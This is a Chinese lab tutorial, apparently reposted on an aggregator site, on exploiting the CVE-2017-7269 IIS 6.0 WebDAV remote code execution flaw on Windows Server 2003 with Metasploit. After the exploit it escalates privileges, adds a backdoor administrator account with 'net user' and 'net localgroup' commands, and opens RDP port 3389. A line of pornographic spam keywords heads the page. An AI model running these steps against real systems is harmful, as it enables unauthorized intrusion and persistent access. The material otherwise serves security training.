日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

iis6.0远程代码执行漏洞

發布時間:2024/8/1 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 iis6.0远程代码执行漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

iis6.0遠程代碼執行漏洞

1、實驗環境搭建

目標主機Windows server2003 sp2

2、目標服務器需要在IIS里面開啟WebDAV

3、靶機IP:192.168.149.136(需要改成自己虛擬機win2003的地址)

Kali IP : 192.168.149.150(需要改成自己虛擬機kali的地址)

4、打開kali并且 把exp 復制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目錄下:
注:exp為資源包,可自行下載,稍后上傳到csdn

https://download.csdn.net/download/G208_522/46134521

kali中啟動Msfconsole,使用CVE-2017-7269攻擊插件

輸入:msfconsole啟動metasploit

5、然后reload_all****重啟****加載exp。

6、use exploit/windows/iis/cve_2017_7269。

7、使用show options查看相關參數。

8、設置目標主機,http主機,以及返回載荷。

9、設置完成,exploit

10、輸入shell查看目前接入權限

11、進入C盤

12、使用md命令創建123文件夾

使用dir命令查看,以及存在123文件夾

13、使用IIS6.exe提權

輸入exit退出至msf命令模式下

使用upload命令上傳IIS6.exe以及3389.bat文件至win2003 C盤下123文件夾。

14、輸入shell進入2003系統,使用提權工具,查看當前權限。

創建用戶

IIS6.0.exe “net user zhangsan 123456 /add”

把張三加入到管理員組

IIS6.0.exe “net localgroup Administrators zhangsan /add”

查看系統是否開啟3389端口。

使用iis6.exe 執行上傳的3389.bat文件。

3389端口已經打開。

我們使用zhangsan用戶進行遠程連接。

打開win10下遠程桌面(快捷命令為mstsc)

總結

以上是生活随笔為你收集整理的iis6.0远程代码执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。